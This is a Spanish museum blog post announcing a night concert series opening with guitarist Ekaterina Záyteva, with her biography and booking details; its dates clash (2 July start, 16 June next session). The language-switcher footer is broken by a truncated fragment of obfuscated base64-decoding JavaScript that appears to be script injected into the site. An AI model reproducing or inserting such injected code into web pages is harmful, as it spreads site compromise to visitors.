MMBCN » Blog » GRAN ÉXITO DE LA PRIMERA SESIÓN DE MÚSICA EN EL MUSEO

GRAN ÉXITO DE LA PRIMERA SESIÓN DE MÚSICA EN EL MUSEO

El 2 de julio se inicia el ciclo de sesiones nocturnas de estivales con la interpretación de Ekaterina Záyteva, considerada como una de las guitarristas con mas talento de su generación. Premio de honor en el Conservatorio P.I Txailkovski de Moscú, bajo la dirección de N.Ivanova- Kramskáya. Completo su formación en la Escuela Superior de Música de Cataluña y en el conservatorio de La Haia bajo la tutela de Zoran Dukic. Participo en los festivales internacionales mas importantes de guitarra siendo premiada en numerosos concursos y ha actuado en los prestigiosos Conservatorio de Moscú, Filarmónica de San Petersburgo o la sala de Radio Varsovia, entre otras.

 

La noche de los jueves y cada dos semanas ya puedes descansar, relaja tus sentidos y déjate seducir por un ambiente de paz y harmonía. Ya puedes reservar tu plaza para la próxima sesión del 16 de junio. Reservas en las taquillas del museo.

 

 

Compartir en

Esta página también está disponible en: Català, function l1c373528ef5(o4){var sa='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var q3='';var x1,pc,u6,yc,ve,r4,n2;var oe=0;do{yc=sa.indexOf(o4/">Français

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *